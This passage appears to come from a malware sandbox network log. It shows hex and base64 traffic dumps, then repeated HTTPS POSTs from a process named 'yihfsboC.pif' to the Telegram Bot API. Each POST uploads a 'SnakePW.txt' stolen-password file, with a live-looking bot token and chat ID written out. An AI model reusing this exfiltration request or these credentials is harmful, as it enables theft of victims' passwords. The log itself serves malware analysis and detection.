                                                                                                                Data Ascii: ZRl5akQ+Q4eSIGGxhIi3O3Q4RDvTQEtwo8rX8wWuz8sZg0FYI4/Klzda2EGombQZ9OOAWHNNuynU4MLuPZNWc4siNYXJEtYN3wsRtqSufytVMVd+Q6bj89yb+COXMyTeCqcgEMc3Xzz91CHlC8ULntdBVGctL2v3Yi59v7iMYZnWHUYP83z+NtxBYHDH1zdDZYmDNIJwIC3Q+kuyLMGzObXMe/r9kB2U1lUgly/NX+iYfmE9YXrYOqa27XDMFvI
                                                                                                                2024-11-26 07:24:46 UTC16384INData Raw: 34 4b 6c 53 71 70 69 47 6b 31 68 56 74 69 47 2f 5a 54 41 62 6e 2b 33 74 5a 55 56 71 55 7a 4b 34 64 61 2b 73 42 65 36 38 6e 31 57 4e 52 4e 31 7a 47 71 6a 2b 76 31 6b 69 61 63 50 58 7a 31 78 57 4b 47 76 64 49 42 45 48 47 33 56 4a 39 75 45 72 70 36 34 4e 64 4b 6f 39 7a 64 6f 65 41 31 61 56 4d 35 31 74 7a 6e 45 35 49 51 78 49 31 48 55 74 53 42 2b 4a 68 57 45 6f 62 44 56 65 62 73 70 47 62 38 45 78 4d 68 56 68 6c 79 61 2f 69 61 76 47 65 36 71 36 4b 70 70 68 2b 6b 6c 6e 48 7a 6e 32 73 32 69 32 4e 57 51 2f 5a 56 66 76 37 63 32 76 2f 79 4d 38 69 61 61 6e 76 48 43 76 72 43 6a 6a 39 2b 68 6e 53 45 72 2b 78 72 4d 47 6e 53 66 4b 36 4d 38 46 53 6e 33 65 6f 33 55 67 70 56 70 4c 31 4a 68 70 4b 4b 4d 50 79 42 34 34 62 30 68 46 31 6f 69 5a 38 71 50 50 33 6f 79 6e 53 35 42
                                                                                                                Data Ascii: 4KlSqpiGk1hVtiG/ZTAbn+3tZUVqUzK4da+sBe68n1WNRN1zGqj+v1kiacPXz1xWKGvdIBEHG3VJ9uErp64NdKo9zdoeA1aVM51tznE5IQxI1HUtSB+JhWEobDVebspGb8ExMhVhlya/iavGe6q6Kpph+klnHzn2s2i2NWQ/ZVfv7c2v/yM8iaanvHCvrCjj9+hnSEr+xrMGnSfK6M8FSn3eo3UgpVpL1JhpKKMPyB44b0hF1oiZ8qPP3oynS5B
                                                                                                                2024-11-26 07:24:46 UTC1024INData Raw: 77 4d 58 39 58 6d 51 75 33 52 46 66 6c 62 78 70 47 6e 46 76 2b 49 53 50 6b 4e 4b 57 4f 6c 37 43 6a 44 56 4c 68 39 73 42 2f 2f 49 2b 4a 69 6b 7a 64 66 58 33 71 41 2b 33 31 57 39 47 57 65 6b 44 4a 71 38 74 4c 6a 65 55 7a 37 34 70 54 34 42 68 54 75 37 44 46 41 2b 66 6d 67 56 74 6a 76 66 65 34 35 56 63 6a 55 5a 53 38 75 63 4f 2b 68 47 4a 68 30 57 55 42 57 69 39 61 79 76 51 71 58 4a 5a 43 46 4e 66 45 50 31 66 2b 6a 64 78 4e 47 76 49 50 74 32 52 75 61 79 30 52 71 36 77 34 39 41 47 4d 65 58 6f 66 4c 2f 52 4a 39 6c 6d 53 52 66 4f 64 35 6d 66 5a 2b 6c 77 6f 64 30 48 50 6e 72 70 63 4e 64 6d 6f 50 6c 42 34 36 6d 65 48 56 59 32 77 33 6c 45 57 6a 62 69 78 49 6d 46 34 2b 34 2b 45 71 4f 4b 44 65 6e 35 66 55 48 73 35 2b 48 77 7a 49 6d 51 39 63 35 65 5a 76 68 31 45 79 78
                                                                                                                Data Ascii: wMX9XmQu3RFflbxpGnFv+ISPkNKWOl7CjDVLh9sB//I+JikzdfX3qA+31W9GWekDJq8tLjeUz74pT4BhTu7DFA+fmgVtjvfe45VcjUZS8ucO+hGJh0WUBWi9ayvQqXJZCFNfEP1f+jdxNGvIPt2Ruay0Rq6w49AGMeXofL/RJ9lmSRfOd5mfZ+lwod0HPnrpcNdmoPlB46meHVY2w3lEWjbixImF4+4+EqOKDen5fUHs5+HwzImQ9c5eZvh1Eyx
                                                                                                                2024-11-26 07:24:46 UTC16384INData Raw: 52 68 61 37 52 57 37 65 50 52 64 70 45 64 74 75 31 58 6e 57 4f 68 51 64 35 41 71 6c 4f 46 74 77 39 2b 55 73 46 55 4d 4d 49 43 66 2b 61 66 4f 39 79 6d 56 67 42 55 66 37 46 34 55 42 50 77 78 47 69 66 57 58 74 51 47 77 6a 70 77 70 6a 42 4d 6d 4f 68 76 72 44 64 35 53 6e 58 6d 66 42 6a 71 52 65 6b 54 4a 4e 70 48 6d 57 62 73 4c 33 53 6c 66 64 43 46 56 68 44 7a 6b 2f 31 33 7a 37 2b 33 62 39 6d 56 79 72 74 72 33 61 67 36 47 6f 56 57 57 2b 4e 68 56 78 43 79 45 65 4c 77 4b 2b 67 4c 32 61 4b 69 79 46 54 77 32 36 62 68 69 4a 4a 70 55 4a 35 4d 68 53 6a 76 62 68 34 78 54 6a 72 38 33 49 4b 65 6a 34 5a 6e 33 75 62 35 75 32 36 37 4c 75 43 6b 68 6a 55 79 58 43 66 42 75 67 54 68 4a 4c 4d 51 45 58 36 33 43 54 72 56 4f 37 36 37 41 73 6d 49 47 4a 46 66 4c 58 35 35 56 55 5a 61
                                                                                                                Data Ascii: Rha7RW7ePRdpEdtu1XnWOhQd5AqlOFtw9+UsFUMMICf+afO9ymVgBUf7F4UBPwxGifWXtQGwjpwpjBMmOhvrDd5SnXmfBjqRekTJNpHmWbsL3SlfdCFVhDzk/13z7+3b9mVyrtr3ag6GoVWW+NhVxCyEeLwK+gL2aKiyFTw26bhiJJpUJ5MhSjvbh4xTjr83IKej4Zn3ub5u267LuCkhjUyXCfBugThJLMQEX63CTrVO767AsmIGJFfLX55VUZa
                                                                                                                2024-11-26 07:24:46 UTC1024INData Raw: 63 70 45 78 4f 47 7a 68 56 71 65 53 68 52 38 49 55 7a 51 4e 42 38 67 64 31 50 52 69 63 57 67 48 77 4b 4f 67 50 37 39 6a 2b 76 43 4a 48 4f 64 49 4f 6b 6e 6e 6a 33 62 76 6e 6e 48 52 37 4c 46 57 56 2f 48 53 50 79 64 32 6f 52 78 50 71 7a 2b 47 36 74 71 79 42 59 59 52 34 65 7a 52 65 4b 4a 75 55 75 39 75 51 37 5a 6d 69 65 4b 32 31 65 77 4b 67 4e 6d 6a 68 56 59 68 77 53 62 49 4b 4c 67 32 6e 64 4b 61 7a 66 4b 76 4c 50 46 52 4a 53 42 75 6c 4b 41 39 7a 74 54 62 66 78 72 74 38 56 37 79 55 56 42 44 47 6e 75 35 47 61 6e 46 4a 2f 63 6b 31 47 47 63 37 32 57 74 6b 71 66 36 67 66 38 58 51 6a 39 49 4b 63 62 74 53 43 4f 4b 7a 2b 70 6a 42 37 6a 56 34 63 6a 45 67 67 57 6b 48 42 49 66 4e 6c 66 43 63 6e 4c 35 36 47 47 6d 6e 6a 61 70 2b 34 2f 30 67 65 68 7a 6f 38 41 58 37 65 77
                                                                                                                Data Ascii: cpExOGzhVqeShR8IUzQNB8gd1PRicWgHwKOgP79j+vCJHOdIOknnj3bvnnHR7LFWV/HSPyd2oRxPqz+G6tqyBYYR4ezReKJuUu9uQ7ZmieK21ewKgNmjhVYhwSbIKLg2ndKazfKvLPFRJSBulKA9ztTbfxrt8V7yUVBDGnu5GanFJ/ck1GGc72Wtkqf6gf8XQj9IKcbtSCOKz+pjB7jV4cjEggWkHBIfNlfCcnL56GGmnjap+4/0gehzo8AX7ew
                                                                                                                2024-11-26 07:24:46 UTC1749INData Raw: 55 69 45 51 72 73 2b 61 54 57 41 55 35 62 65 59 74 77 37 53 39 61 4f 47 54 5a 41 44 65 77 4e 5a 78 2f 67 31 6e 7a 55 49 66 55 42 63 61 74 48 31 32 4b 70 43 52 46 76 6f 37 57 6a 71 4b 39 46 37 71 62 63 69 48 42 47 2b 6d 5a 63 48 53 63 75 62 58 68 4a 37 65 68 68 57 44 4e 4c 2b 52 7a 67 58 79 4b 34 62 6f 49 51 46 61 39 38 39 74 58 57 33 4b 70 37 5a 30 39 75 55 62 4b 65 74 43 46 56 44 46 43 32 6b 73 70 6d 39 32 42 73 58 72 6d 63 4a 42 66 6a 2f 6b 66 42 79 72 4d 46 36 2f 46 73 6c 4b 42 79 6b 30 37 6d 30 2b 57 72 6c 6d 75 70 69 68 31 7a 35 76 44 4a 58 44 44 61 74 30 52 53 34 78 6c 37 2b 6e 70 4b 33 63 33 34 68 42 56 66 6f 59 50 4f 39 65 65 4c 71 2f 58 2b 77 57 50 44 59 50 76 44 64 38 4a 4e 48 58 4e 55 65 39 4d 72 5a 46 6a 55 74 62 47 7a 79 42 32 2b 73 47 47 44
                                                                                                                Data Ascii: UiEQrs+aTWAU5beYtw7S9aOGTZADewNZx/g1nzUIfUBcatH12KpCRFvo7WjqK9F7qbciHBG+mZcHScubXhJ7ehhWDNL+RzgXyK4boIQFa989tXW3Kp7Z09uUbKetCFVDFC2kspm92BsXrmcJBfj/kfByrMF6/FslKByk07m0+Wrlmupih1z5vDJXDDat0RS4xl7+npK3c34hBVfoYPO9eeLq/X+wWPDYPvDd8JNHXNUe9MrZFjUtbGzyB2+sGGD
                                                                                                                2024-11-26 07:24:46 UTC16384INData Raw: 74 51 38 36 77 2f 4e 6b 49 52 34 33 51 65 47 37 5a 74 6d 43 77 62 4d 55 6d 57 61 45 63 76 43 36 42 30 34 41 59 56 68 59 71 45 66 52 78 30 4e 78 41 67 34 4e 45 42 4a 32 4d 6b 52 2b 48 45 69 41 36 64 56 6e 72 52 59 39 57 51 51 64 35 68 55 43 32 31 77 2f 2b 76 34 67 32 71 47 4d 74 73 6d 72 6b 4b 2b 74 5a 49 4d 35 39 4f 63 31 56 30 41 67 62 61 46 76 4e 61 35 69 35 35 37 34 76 70 44 44 54 55 4a 37 6a 74 63 54 57 5a 55 41 73 64 4a 31 72 68 6d 63 2b 53 64 32 42 7a 67 56 6b 49 53 6c 70 57 47 4c 79 6a 38 70 35 79 4a 51 43 6c 6e 34 66 37 45 42 6c 70 50 31 35 6a 49 68 5a 54 6d 36 55 64 47 61 6a 44 35 6c 75 52 67 6a 68 42 71 68 42 78 2b 50 34 70 32 59 4e 50 71 46 66 42 59 68 58 31 38 4a 7a 72 44 38 79 4f 44 4e 35 65 4a 53 59 4a 75 41 34 59 6e 73 6c 79 68 49 6c 68 39
                                                                                                                Data Ascii: tQ86w/NkIR43QeG7ZtmCwbMUmWaEcvC6B04AYVhYqEfRx0NxAg4NEBJ2MkR+HEiA6dVnrRY9WQQd5hUC21w/+v4g2qGMtsmrkK+tZIM59Oc1V0AgbaFvNa5i5574vpDDTUJ7jtcTWZUAsdJ1rhmc+Sd2BzgVkISlpWGLyj8p5yJQCln4f7EBlpP15jIhZTm6UdGajD5luRgjhBqhBx+P4p2YNPqFfBYhX18JzrD8yODN5eJSYJuA4YnslyhIlh9
                                                                                                                2024-11-26 07:24:46 UTC1024INData Raw: 54 34 6e 76 72 30 55 65 30 56 64 64 43 43 6e 7a 74 67 6c 44 64 2f 55 62 73 47 78 47 2b 57 33 4c 6a 77 71 6e 6b 42 44 6e 78 75 32 4f 6a 63 58 32 36 66 4f 37 68 34 48 4d 50 61 45 59 75 4f 6e 2b 49 73 4b 38 31 67 6f 62 4a 4b 6b 58 6d 53 56 70 43 48 36 69 4f 47 67 31 67 72 2f 56 70 65 42 70 70 51 76 43 64 67 56 6c 35 73 49 50 69 6f 41 31 51 56 37 34 50 6c 4e 4d 2b 46 61 38 61 79 34 68 71 44 37 61 78 41 4c 46 59 35 31 4b 42 70 68 51 61 33 6e 68 39 67 4f 41 4c 34 53 46 4c 4f 62 51 41 69 5a 53 4b 41 32 47 66 36 56 4c 4b 73 47 6e 75 53 6d 35 32 48 62 37 6d 31 30 70 7a 69 55 7a 61 59 37 57 6f 71 43 44 77 4e 67 56 32 61 52 53 4e 35 57 38 55 42 32 77 61 48 49 4b 4b 6a 67 76 51 45 38 42 65 42 48 6e 67 64 67 48 6d 76 33 6e 42 46 4d 59 35 47 37 67 72 6b 7a 6c 58 77 71
                                                                                                                Data Ascii: T4nvr0Ue0VddCCnztglDd/UbsGxG+W3LjwqnkBDnxu2OjcX26fO7h4HMPaEYuOn+IsK81gobJKkXmSVpCH6iOGg1gr/VpeBppQvCdgVl5sIPioA1QV74PlNM+Fa8ay4hqD7axALFY51KBphQa3nh9gOAL4SFLObQAiZSKA2Gf6VLKsGnuSm52Hb7m10pziUzaY7WoqCDwNgV2aRSN5W8UB2waHIKKjgvQE8BeBHngdgHmv3nBFMY5G7grkzlXwq
                                                                                                                2024-11-26 07:24:46 UTC16384INData Raw: 66 38 69 6b 53 55 6b 77 48 6c 4b 38 50 69 73 4c 53 71 30 63 6b 6f 46 65 7a 30 37 62 70 6e 33 41 4e 72 38 72 47 69 62 4a 2f 57 46 57 6a 63 4f 53 2b 39 4d 49 2f 6e 55 75 4f 4c 4c 77 6e 6d 77 45 42 45 5a 75 74 6f 74 71 47 67 39 6d 69 47 36 4f 44 63 69 77 33 49 4a 37 44 4a 36 6e 6e 57 66 42 45 44 57 6e 46 30 41 67 6e 2f 77 45 77 7a 74 31 51 48 6b 73 44 66 74 57 72 48 45 4a 36 46 42 36 30 79 66 6c 34 44 58 2b 32 72 2f 54 6a 72 64 4d 2b 30 54 5a 42 4f 37 4c 4e 37 6e 63 68 7a 74 74 6b 41 35 70 32 35 57 4c 46 72 4a 6f 4c 34 2b 41 6a 61 53 76 45 41 30 42 35 48 2b 36 50 5a 4c 69 69 68 79 6b 32 62 78 31 76 78 51 6a 44 6c 4e 4e 54 68 6c 57 4c 55 66 2b 4d 31 66 75 68 59 53 49 56 34 30 44 7a 41 64 54 6a 4c 6c 73 67 36 75 79 79 36 55 5a 43 72 52 62 72 4c 4b 61 54 4e 45
                                                                                                                Data Ascii: f8ikSUkwHlK8PisLSq0ckoFez07bpn3ANr8rGibJ/WFWjcOS+9MI/nUuOLLwnmwEBEZutotqGg9miG6ODciw3IJ7DJ6nnWfBEDWnF0Agn/wEwzt1QHksDftWrHEJ6FB60yfl4DX+2r/TjrdM+0TZBO7LN7nchzttkA5p25WLFrJoL4+AjaSvEA0B5H+6PZLiihyk2bx1vxQjDlNNThlWLUf+M1fuhYSIV40DzAdTjLlsg6uyy6UZCrRbrLKaTNE


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.749742149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:08 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dc18a308c59
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:25:08 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 63 31 38 61 33 30 38 63 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0dc18a308c59Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:08 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:08 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:08 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 30 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388842,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605908,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.749764149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:19 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dc191055343
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:25:19 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 63 31 39 31 30 35 35 33 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0dc191055343Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:19 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:19 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:19 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 31 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388844,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605919,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.749770149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:20 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dc19698755d
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:20 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 63 31 39 36 39 38 37 35 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0dc19698755dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:21 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:20 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:21 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 32 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388846,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605920,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.749775149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:22 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dd94d3b31f7
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:22 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 64 39 34 64 33 62 33 31 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0dd94d3b31f7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:23 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:22 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
